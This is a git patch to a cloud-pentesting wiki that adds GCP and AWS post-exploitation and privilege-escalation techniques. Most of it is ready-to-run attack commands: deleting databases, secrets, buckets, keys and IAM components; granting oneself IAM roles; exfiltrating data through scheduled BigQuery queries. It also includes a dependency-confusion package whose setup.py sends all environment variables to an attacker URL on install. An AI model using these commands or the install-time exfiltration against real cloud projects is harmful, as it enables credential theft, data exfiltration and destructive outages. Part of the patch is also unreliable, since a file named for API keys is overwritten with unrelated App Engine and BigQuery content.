From 5380f79daff81aed631edfda9e26eeaa99f69852 Mon Sep 17 00:00:00 2001 From: JaimePolop Date: Tue, 25 Nov 2025 17:13:06 +0100 Subject: [PATCH 1/3] GCP update --- src/SUMMARY.md | 1 + .../aws-rds-post-exploitation/README.md | 34 ++ .../gcp-app-engine-post-exploitation.md | 13 +- .../gcp-cloud-functions-post-exploitation.md | 23 +- .../gcp-cloud-run-post-exploitation.md | 13 + .../gcp-iam-post-exploitation.md | 37 +- .../gcp-kms-post-exploitation.md | 30 ++ .../gcp-pub-sub-post-exploitation.md | 28 ++ .../gcp-secretmanager-post-exploitation.md | 31 ++ .../gcp-storage-post-exploitation.md | 71 ++- .../gcp-apikeys-privesc.md | 161 ++++-- .../gcp-artifact-registry-privesc.md | 60 +++ .../gcp-cloudfunctions-privesc.md | 25 +- .../gcp-compute-privesc/README.md | 151 ------ .../gcp-add-custom-ssh-metadata.md | 100 ---- .../gcp-firebase-privesc.md | 474 ++++++++++++++++++ .../gcp-iam-privesc.md | 47 +- .../gcp-pubsub-privesc.md | 43 +- .../gcp-run-privesc.md | 55 +- .../gcp-secretmanager-privesc.md | 7 + .../gcp-storage-privesc.md | 64 ++- 21 files changed, 1074 insertions(+), 394 deletions(-) delete mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md delete mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index eba659a072..803b176ad1 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -125,6 +125,7 @@ - [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md) - [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md) - [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md) + - [GCP - Firebase Privesc](pentesting-cloud/gcp-security/gcp-services/gcp-firebase-privesc.md) - [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md) - [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md) - [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md index b9f42ec05c..66dcf443d1 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation/README.md @@ -57,6 +57,40 @@ aws rds stop-db-cluster \ --db-cluster-identifier ``` +### `rds:Modify*` +An attacker granted rds:Modify* permissions can alter critical configurations and auxiliary resources (parameter groups, option groups, proxy endpoints and endpoint-groups, target groups, subnet groups, capacity settings, snapshot/cluster attributes, certificates, integrations, etc.) without touching the instance or cluster directly. Changes such as adjusting connection/time-out parameters, changing a proxy endpoint, modifying which certificates are trusted, altering logical capacity, or reconfiguring a subnet group can weaken security (open new access paths), break routing and load-balancing, invalidate replication/backup policies, and generally degrade availability or recoverability. 
These modifications can also facilitate indirect data exfiltration or hinder an orderly recovery of the database after an incident. + +Move or change the subnets assigned to an RDS subnet group: + +```bash +aws rds modify-db-subnet-group \ + --db-subnet-group-name \ + --subnet-ids +``` + +Alter low-level engine parameters in a cluster parameter group: + +```bash +aws rds modify-db-cluster-parameter-group \ + --db-cluster-parameter-group-name \ + --parameters "ParameterName=,ParameterValue=,ApplyMethod=immediate" +``` + +### `rds:Restore*` + +An attacker with rds:Restore* permissions can restore entire databases from snapshots, automated backups, point-in-time recovery (PITR), or files stored in S3, creating new instances or clusters populated with the data from the selected point. These operations do not overwrite the original resources — they create new objects containing the historical data — which allows an attacker to obtain full, functional copies of the database (from past points in time or from external S3 files) and use them to exfiltrate data, manipulate historical records, or rebuild previous states. + +Restore a DB instance to a specific point in time: + +```bash +aws rds restore-db-instance-to-point-in-time \ + --source-db-instance-identifier \ + --target-db-instance-identifier \ + --restore-time "" \ + --db-instance-class \ + --publicly-accessible --no-multi-az +``` + ### `rds:Delete*` An attacker granted rds:Delete* can remove RDS resources, deleting DB instances, clusters, snapshots, automated backups, subnet groups, parameter/option groups and related artifacts, causing immediate service outage, data loss, destruction of recovery points and loss of forensic evidence. diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md index 725c94c857..3f96515f6d 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md @@ -28,15 +28,18 @@ With these permissions it's possible to: With this permission it's possible to **see the logs of the App**: -
```bash
gcloud app logs tail -s <service-name>
```
+### Service and version deletion + +The `appengine.versions.delete`, `appengine.versions.list`, and `appengine.services.list` permissions allow managing and deleting specific versions of an App Engine application, which can affect traffic if it is split or if the only stable version is removed. Meanwhile, the `appengine.services.delete` and `appengine.services.list` permissions allow listing and deleting entire services—an action that immediately disrupts all traffic and the availability of the associated versions. + +```bash +gcloud app versions delete +gcloud app services delete +``` ### Read Source Code diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md index 502c49436f..198872b67b 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md @@ -14,10 +14,6 @@ Find some information about Cloud Functions in: With this permission you can get a **signed URL to be able to download the source code** of the Cloud Function: -
```bash
curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions/{function-name}:generateDownloadUrl \
  -H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
  -d '{}'
```
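The JSON response should include a signed `downloadUrl` (field name assumed from the v2 `generateDownloadUrl` response shape); a rough sketch of extracting it and pulling down the source archive:

```bash
# Hypothetical follow-up: extract the signed URL from the response and download the source
DOWNLOAD_URL=$(curl -s -X POST "https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions/{function-name}:generateDownloadUrl" \
  -H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
  -d '{}' | jq -r '.downloadUrl')

curl -o function-source.zip "$DOWNLOAD_URL"
unzip function-source.zip -d function-source/
```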
+### `cloudfunctions.functions.delete` +The `cloudfunctions.functions.delete` permission allows an identity to completely delete a Cloud Function, including its code, configuration, triggers, and its association with service accounts. + +```bash +gcloud functions delete \ + --region=us-central1 \ + --quiet +``` + +### Code Exfiltration through the bucket +The `storage.objects.get` and `storage.objects.list` permissions allow listing and reading objects inside a bucket, and in the case of Cloud Functions this is especially relevant because each function stores its source code in an automatically managed Google bucket, whose name follows the format `gcf-sources--` + ### Steal Cloud Function Requests @@ -35,10 +42,6 @@ Moreover, Cloud Functions running in python use **flask** to expose the web serv For example this code implements the attack: -
- -Steal Cloud Function requests (Python injection) - ```python import functions_framework @@ -136,8 +139,6 @@ def injection(): return str(e) ``` -
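To get the injected code running in the victim function, it would typically be pushed with a redeploy. A minimal sketch, assuming `cloudfunctions.functions.update` (and `actAs` over the runtime service account), with placeholder names and runtime:

```bash
# Hypothetical redeploy of the backdoored source over the existing function
gcloud functions deploy <function-name> \
  --region=<region> \
  --runtime=python312 \
  --entry-point=<original-entry-point> \
  --source=/path/to/backdoored/source \
  --trigger-http
```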
- {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md index 99cdea20d5..cd5588176f 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md @@ -10,6 +10,19 @@ For more information about Cloud Run check: ../gcp-services/gcp-cloud-run-enum.md {{#endref}} +### Delete CloudRun Job +The `run.services.delete` and `run.services.get permissions`, as well as run.jobs.delete, allow an identity to completely delete a Cloud Run service or job, including its configuration and history. In the hands of an attacker, this can cause immediate disruption to applications or critical workflows, resulting in a denial of service (DoS) for users and systems that depend on the service logic or essential scheduled tasks. + +To delete a job, the following operation can be performed. +```bash +gcloud run jobs delete --region= --quiet +``` + +To delete a service, the following operation can be performed. +```bash +gcloud run services delete --region= --quiet +``` + ### Access the images If you can access the container images check the code for vulnerabilities and hardcoded sensitive information. Also for sensitive information in env variables. diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md index e0075121fe..3e09b53d09 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md @@ -18,20 +18,45 @@ To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, You can use the following command to **grant a user the primitive role of Editor** to your existing project: -
- -Grant Editor role to user - ```bash gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor ``` -
- If you succeeded here, try **accessing the web interface** and exploring from there. This is the **highest level you can assign using the gcloud tool**. +### Delete IAM components `iam.*.delete` +The `iam.*.delete` permissions (e.g., `iam.roles.delete`, `iam.serviceAccountApiKeyBindings.delete`, `iam.serviceAccountKeys.delete`, etc.) allow an identity to delete critical IAM components such as custom roles, API key bindings, service account keys, and the service accounts themselves. In the hands of an attacker, this makes it possible to remove legitimate access mechanisms in order to cause a denial of service. + +To carry out such an attack, it is possible, for example, to delete roles using: +```bash +gcloud iam roles delete --project= +``` + +### `iam.serviceAccountKeys.disable` || `iam.serviceAccounts.disable` + +The `iam.serviceAccountKeys.disable` and `iam.serviceAccounts.disable` permissions allow disabling active service account keys or service accounts, which in the hands of an attacker could be used to disrupt operations, cause denial of service, or hinder incident response by preventing the use of legitimate credentials. + +To disable a Service Account, you can use the following command: + +```bash +gcloud iam service-accounts disable --project= +``` + +To disable the keys of a Service Account, you can use the following command: + +```bash +gcloud iam service-accounts keys disable --iam-account= +``` + +### `iam.*.undelete` +The `iam.*.undelete` permissions allow restoring previously deleted elements such as API key bindings, custom roles, or service accounts. In the hands of an attacker, this can be used to reverse defensive actions (recover removed access), re-establish deleted compromise vectors to maintain persistence, or evade remediation efforts, complicating incident containment. + +```bash +gcloud iam service-accounts undelete "${SA_ID}" --project="${PROJECT}" +``` + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md index 1831f24d1c..8cfa1adebc 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md @@ -282,6 +282,36 @@ verified = verify_asymmetric_signature(project_id, location_id, key_ring_id, key print('Verified:', verified) ``` +### `cloudkms.cryptoKeyVersions.restore` +The `cloudkms.cryptoKeyVersions.restore` permission allows an identity to restore a key version that was previously scheduled for destruction or disabled in Cloud KMS, returning it to an active and usable state. + +```bash +gcloud kms keys versions restore \ + --key= \ + --keyring= \ + --location= \ + --project= +``` + +### `cloudkms.cryptoKeyVersions.update` +The `cloudkms.cryptoKeyVersions.update` permission allows an identity to modify the attributes or the state of a specific key version in Cloud KMS, for example by enabling or disabling it. 
+ +```bash +# Disable key +gcloud kms keys versions disable \ + --key= \ + --keyring= \ + --location= \ + --project= + +# Enable key +gcloud kms keys versions enable \ + --key= \ + --keyring= \ + --location= \ + --project= +``` + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md index c12ba98b0e..9a708d9e37 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md @@ -62,6 +62,34 @@ Use this permission to update some setting of the topic to disrupt it, like `--c Give yourself permission to perform any of the previous attacks. +```bash +# Add Binding +gcloud pubsub topics add-iam-policy-binding \ + --member="serviceAccount:@.iam.gserviceaccount.com" \ + --role="" \ + --project="" + +# Remove Binding +gcloud pubsub topics remove-iam-policy-binding \ + --member="serviceAccount:@.iam.gserviceaccount.com" \ + --role="" \ + --project="" + +# Change Policy +gcloud pubsub topics set-iam-policy \ + <(echo '{ + "bindings": [ + { + "role": "", + "members": [ + "serviceAccount:@.iam.gserviceaccount.com" + ] + } + ] + }') \ + --project= +``` + ### **`pubsub.subscriptions.create,`**`pubsub.topics.attachSubscription` , (`pubsub.subscriptions.consume`) Get all the messages in a web server: diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md index 6bf39c96a9..e93aeac905 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md @@ -25,6 +25,37 @@ gcloud secrets versions access 1 --secret="" +### `secretmanager.versions.destroy` +The `secretmanager.versions.destroy` permission allows an identity to permanently destroy (mark as irreversibly deleted) a specific version of a secret in Secret Manager, which could enable the removal of critical credentials and potentially cause denial of service or prevent the recovery of sensitive data. + +```bash +gcloud secrets versions destroy --secret="" --project= +``` + +### `secretmanager.versions.disable` +The `secretmanager.versions.disable` permission allows an identity to disable active secret versions in Secret Manager, temporarily blocking their use by applications or services that depend on them. + +```bash +gcloud secrets versions disable --secret="" --project= +``` + +### `secretmanager.secrets.delete` +The `secretmanager.secrets.delete` permission set allows an identity to completely delete a secret and all of its stored versions in Secret Manager. + +```bash +gcloud secrets delete --project= +``` + +### `secretmanager.secrets.update` +The `secretmanager.secrets.update` permission allows an identity to modify a secret’s metadata and configuration (for example, rotation settings, version policy, labels, and certain secret properties). 
+ +```bash +gcloud secrets update SECRET_NAME \ + --project=PROJECT_ID \ + --clear-labels \ + --rotation-period=DURATION +``` + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md index 94b7ccc610..1ea8a8fe08 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md @@ -14,10 +14,6 @@ For more information about CLoud Storage check this page: It's possible to give external users (logged in GCP or not) access to buckets content. However, by default bucket will have disabled the option to expose publicly a bucket: -
- -Make bucket/objects public - ```bash # Disable public prevention gcloud storage buckets update gs://BUCKET_NAME --no-public-access-prevention @@ -31,12 +27,75 @@ gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,r gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER ``` -
- If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access` To access open buckets via browser, access the URL `https://.storage.googleapis.com/` or `https://.storage.googleapis.com/` +### `storage.objects.delete` (`storage.objects.get`) + +To delete an object: +```bash +gcloud storage rm gs:/// --project= +``` + +### `storage.buckets.delete`, `storage.objects.delete` & `storage.objects.list` + +To delete a bucket: +```bash +gcloud storage rm -r gs:// +``` + +### Deactivate HMAC Keys + +The `storage.hmacKeys.update` permission allows disabling HMAC keys, and the `storage.hmacKeys.delete` permission allows an identity to delete HMAC keys associated with service accounts in Cloud Storage. + +```bash +# Deactivate +gcloud storage hmac update --deactivate + +# Delete +gcloud storage hmac delete +``` + + +### `storage.buckets.setIpFilter` & `storage.buckets.update` +The `storage.buckets.setIpFilter` permission, together with the `storage.buckets.update` permission, allows an identity to configure IP address filters on a Cloud Storage bucket, specifying which IP ranges or addresses are allowed to access the bucket’s resources. + +To completely clear the IP filter, the following command can be used: + +```bash +gcloud storage buckets update gs:// --project= +``` + +To change the filtered IPs, the following command can be used: + +```bash +gcloud storage buckets update gs:// \ + --ip-filter-file=ip-filter.json \ + --project= +``` + +The JSON file represents the filter itself, something like: +```bash +{ + "mode": "Enabled", + "publicNetworkSource": { + "allowedIpCidrRanges": ["/"] + }, + "allowCrossOrgVpcs": false, + "allowAllServiceAgentAccess": false +} +``` + +### `storage.buckets.restore` +Restore a bucket using: + +```bash +gcloud storage restore gs://# \ + --project= +``` + + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md index 314af2fa85..3385dffa13 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md @@ -1,95 +1,154 @@ -# GCP - Apikeys Privesc +# GCP - AppEngine Privesc {{#include ../../../banners/hacktricks-training.md}} -## Apikeys +## App Engine -The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._ - -Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges. 
- -For more information about API Keys check: +For more information about App Engine check: {{#ref}} -../gcp-services/gcp-api-keys-enum.md +../gcp-services/gcp-app-engine-enum.md {{#endref}} -For other ways to create API keys check: +### `appengine.applications.get`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.operations.list`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.create`, `appengine.versions.get`, `appengine.versions.list`, `cloudbuild.builds.get`,`iam.serviceAccounts.actAs`, `resourcemanager.projects.get`, `storage.objects.create`, `storage.objects.list` -{{#ref}} -gcp-serviceusage-privesc.md -{{#endref}} +Those are the needed permissions to **deploy an App using `gcloud` cli**. Maybe the **`get`** and **`list`** ones could be **avoided**. + +You can find python code examples in [https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine](https://github.com/GoogleCloudPlatform/python-docs-samples/tree/main/appengine) + +By default, the name of the App service is going to be **`default`**, and there can be only 1 instance with the same name.\ +To change it and create a second App, in **`app.yaml`**, change the value of the root key to something like **`service: my-second-app`** + +```bash +cd python-docs-samples/appengine/flexible/hello_world +gcloud app deploy #Upload and start application inside the folder +``` -### Brute Force API Key access +Give it at least 10-15min, if it doesn't work call **deploy another of times** and wait some minutes. -As you might not know which APIs are enabled in the project or the restrictions applied to the API key you found, it would be interesting to run the tool [**https://github.com/ozguralp/gmapsapiscanner**](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.** +> [!NOTE] +> It's **possible to indicate the Service Account to use** but by default, the App Engine default SA is used. -### `apikeys.keys.create` +The URL of the application is something like `https://.oa.r.appspot.com/` or `https://-dot-.oa.r.appspot.com` -This permission allows to **create an API key**: +### Update equivalent permissions -
-Create an API key using gcloud +You might have enough permissions to update an AppEngine but not to create a new one. In that case this is how you could update the current App Engine: ```bash -gcloud services api-keys create -Operation [operations/akmf.p7-[...]9] complete. Result: { - "@type":"type.googleapis.com/google.api.apikeys.v2.Key", - "createTime":"2022-01-26T12:23:06.281029Z", - "etag":"W/\"HOhA[...]=\"", - "keyString":"AIzaSy[...]oU", - "name":"projects/5[...]6/locations/global/keys/f707[...]e8", - "uid":"f707[...]e8", - "updateTime":"2022-01-26T12:23:06.378442Z" -} +# Find the code of the App Engine in the buckets +gsutil ls + +# Download code +mkdir /tmp/appengine2 +cd /tmp/appengine2 +## In this case it was found in this custom bucket but you could also use the +## buckets generated when the App Engine is created +gsutil cp gs://appengine-lab-1-gcp-labs-4t04m0i6-3a97003354979ef6/labs_appengine_1_premissions_privesc.zip . +unzip labs_appengine_1_premissions_privesc.zip + +## Now modify the code.. + +## If you don't have an app.yaml, create one like: +cat >> app.yaml <@$PROJECT_ID.iam.gserviceaccount.com ``` -
+If you have **already compromised a AppEngine** and you have the permission **`appengine.applications.update`** and **actAs** over the service account to use you could modify the service account used by AppEngine with: -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/b-apikeys.keys.create.sh). +```bash +gcloud app update --service-account=@$PROJECT_ID.iam.gserviceaccount.com +``` -> [!CAUTION] -> Note that by default users have permissions to create new projects adn they are granted Owner role over the new project. So a user could c**reate a project and an API key inside this project**. +### `appengine.instances.enableDebug`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.get`, `appengine.versions.list`, `compute.projects.get` -### `apikeys.keys.getKeyString` , `apikeys.keys.list` +With these permissions, it's possible to **login via ssh in App Engine instances** of type **flexible** (not standard). Some of the **`list`** and **`get`** permissions **could not be really needed**. + +```bash +gcloud app instances ssh --service --version +``` -These permissions allows **list and get all the apiKeys and get the Key**: +### `appengine.applications.update`, `appengine.operations.get` -
-List and retrieve all API keys +I think this just change the background SA google will use to setup the applications, so I don't think you can abuse this to steal the service account. ```bash -for key in $(gcloud services api-keys list --uri); do - gcloud services api-keys get-key-string "$key" -done +gcloud app update --service-account= ``` -
+### `appengine.versions.getFileContents`, `appengine.versions.update` + +Not sure how to use these permissions or if they are useful (note that when you change the code a new version is created so I don't know if you can just update the code or the IAM role of one, but I guess you should be able to, maybe changing the code inside the bucket??). + +### `bigquery.tables.delete`, `bigquery.datasets.delete` & `bigquery.models.delete` (`bigquery.models.getMetadata`) + +To remove tables, dataset or models: +```bash +# Table removal +bq rm -f -t .. + +# Dataset removal +bq rm -r -f : + +# Model removal +bq rm -m :. +``` -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh). +### Abuse of Scheduled Queries -### `apikeys.keys.undelete` , `apikeys.keys.list` +With the `bigquery.datasets.get`, `bigquery.jobs.create`, and `iam.serviceAccounts.actAs` permissions, an identity can query dataset metadata, launch BigQuery jobs, and execute them using a Service Account with higher privileges. -These permissions allow you to **list and regenerate deleted api keys**. The **API key is given in the output** after the **undelete** is done: +This attack enables malicious use of Scheduled Queries to automate queries (running under the chosen Service Account), which can, for example, lead to sensitive data being read and written into another table or dataset that the attacker does have access to—facilitating indirect and continuous exfiltration without needing to extract the data externally. -
-List and undelete API keys +Once the attacker knows which Service Account has the necessary permissions to execute the desired query, they can create a Scheduled Query configuration that runs using that Service Account and periodically writes the results into a dataset of their choosing. ```bash -gcloud services api-keys list --show-deleted -gcloud services api-keys undelete +bq mk \ + --transfer_config \ + --project_id= \ + --location=US \ + --data_source=scheduled_query \ + --target_dataset= \ + --display_name="Generic Scheduled Query" \ +--service_account_name="@.iam.gserviceaccount.com" \ + --schedule="every 10 minutes" \ + --params='{ + "query": "SELECT * FROM `..`;", + "destination_table_name_template": "", + "write_disposition": "WRITE_TRUNCATE" + }' + ``` -
+### Write Access over the buckets + +As mentioned the appengine versions generate some data inside a bucket with the format name: `staging..appspot.com`. Note that it's not possible to pre-takeover this bucket because GCP users aren't authorized to generate buckets using the domain name `appspot.com`. -### Create Internal OAuth Application to phish other workers +However, with read & write access over this bucket, it's possible to escalate privileges to the SA attached to the AppEngine version by monitoring the bucket and any time a change is performed, modify as fast as possible the code. This way, the container that gets created from this code will **execute the backdoored code**. -Check the following page to learn how to do this, although this action belongs to the service **`clientauthconfig`** [according to the docs](https://cloud.google.com/iap/docs/programmatic-oauth-clients#before-you-begin): +For more information and a **PoC check the relevant information from this page**: {{#ref}} -../../workspace-security/gws-google-platforms-phishing/ +gcp-storage-privesc.md {{#endref}} +### Write Access over the Artifact Registry + +Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\ +It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested. + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md index 6e8e495f6c..2c77f4b474 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md @@ -228,6 +228,66 @@ When a Cloud Function is created a new docker image is pushed to the Artifact Re Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\ It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested. + +### `artifactregistry.repositories.update` +An attacker does not need specific Artifact Registry permissions to exploit this issue—only a vulnerable virtual-repository configuration. This occurs when a virtual repository combines a remote public repository (e.g., PyPI, npm) with an internal one, and the remote source has equal or higher priority. If both contain a package with the same name, the system selects the highest version. The attacker only needs to know the internal package name and be able to publish packages to the corresponding public registry. + +With the `artifactregistry.repositories.update` permission, an attacker could change a virtual repository’s upstream settings to intentionally create this vulnerable setup and use Dependency Confusion as a persistence method by inserting malicious packages that developers or CI/CD systems may install automatically. 
+ +The attacker creates a malicious version of the internal package in the public repository with a higher version number. For Python packages, this means preparing a package structure that mimics the legitimate one. + +```bash +mkdir /tmp/malicious_package +cd /tmp/malicious_package +PACKAGE_NAME="" +mkdir "$PACKAGE_NAME" +touch "$PACKAGE_NAME/__init__.py" +``` + +A setup.py file is then created containing malicious code that would run during installation. This file must specify a version number higher than the one in the private repository. + +```bash +cat > setup.py << 'EOF' +import setuptools +from setuptools.command.install import install +import os +import urllib.request +import urllib.parse + +def malicious_function(): + data = dict(os.environ) + encoded_data = urllib.parse.urlencode(data).encode() + url = 'https:///exfil' + req = urllib.request.Request(url, data=encoded_data) + urllib.request.urlopen(req) + +class AfterInstall(install): + def run(self): + install.run(self) + malicious_function() + +setuptools.setup( + name = "", + version = "0.1.1", + packages = [""], + cmdclass={'install': AfterInstall}, +) +EOF +``` +Build the package and delete the wheel to ensure the code is executed during installation. +```bash +python3 setup.py sdist bdist_wheel +rm dist/*.whl +``` + +Upload the malicious package to the public repository (for example, test.pypi.org for Python). +```bash +pip install twine +twine upload --repository testpypi dist/* +``` + +When a system or service installs the package using the virtual repository, it will download the malicious version from the public repository instead of the legitimate internal one, because the malicious version is higher and the remote repository has equal or higher priority. + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md index 5f853fe3d1..2c08fdf3e1 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md @@ -26,8 +26,6 @@ An attacker with these privileges can **modify the code of a Function and even m Some extra privileges like `.call` permission for version 1 cloudfunctions or the role `role/run.invoker` to trigger the function might be required. -
Update Cloud Function with malicious code to exfiltrate service account token - ```bash # Create new code temp_dir=$(mktemp -d) @@ -58,8 +56,6 @@ gcloud functions deploy \ gcloud functions call ``` -
- > [!CAUTION] > If you get the error `Permission 'run.services.setIamPolicy' denied on resource...` is because you are using the `--allow-unauthenticated` param and you don't have enough permissions for it. @@ -69,8 +65,6 @@ The exploit script for this method can be found [here](https://github.com/RhinoS With this permission you can get a **signed URL to be able to upload a file to a function bucket (but the code of the function won't be changed, you still need to update it)** -
```bash
# Generate the URL
curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions:generateUploadUrl \
  -H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
  -d '{}'
```
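If needed, the returned `uploadUrl` can then be used to push a source zip to the staging bucket (a sketch; as noted above, the function itself still has to be updated separately to pick it up):

```bash
# Hypothetical upload of a source archive to the signed URL returned in the response
curl -X PUT "<uploadUrl-from-response>" \
  -H "Content-Type: application/zip" \
  --upload-file function-source.zip
```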
